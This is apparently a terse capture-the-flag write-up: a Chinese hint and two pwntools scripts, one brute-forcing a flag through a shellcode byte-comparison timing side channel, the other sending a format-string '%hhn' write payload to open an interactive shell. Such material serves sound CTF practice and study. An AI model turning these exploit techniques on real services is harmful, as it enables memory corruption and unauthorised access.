NoooCall
这个要 用shellcode 字节对比。
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * import sys from string import printable context(arch='amd64',os='linux',endian='little') #context.log_level = 'debug' host = "192.168.244.161" port = 8888 #host = '121.36.64.245' #port = 10003 def expolit(c,i): time_start=time.time() r = remote(host,port) #payload = '''and rdi,0x1 #mov rsi,[rbp-32] #push 0x1 #pop rax #syscall''' payload ='''mov bl,%d mov rax,[rbp-32] add al,%d cmp byte ptr [rax],bl jz crash ret crash: jmp $ '''%(c,i) r.recvuntil("Your Shellcode >>") #raw_input() r.send(asm(payload)) try: r.recv(timeout=1) except: #log.info('sysyssss') return 555555 return c flag='' nn=0 for nn in range(0,32): for i in printable: s=expolit(ord(i),nn) if s==555555: continue else: flag=flag+i if i=='}': print flag sys.exit(0) log.info(flag) #raw_input() break
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * context.log_level = 'debug' host = "192.168.244.161" port = 8888 #r = process("") r = remote(host,port) def rsl(c1,c2): r.recvuntil(c1) r.sendline(c2) def rs(c1,c2): r.recvuntil(c1) r.send(c2) r.recvuntil("...\n") r.recvuntil("...\n") #raw_input() payload = '%188c%10$hhn|%171c%18$hhn|%189c%10$hhn|%133c%18$hhn' r.send(payload.ljust(0x37,'\x00')) r.interactive()
Shellmaster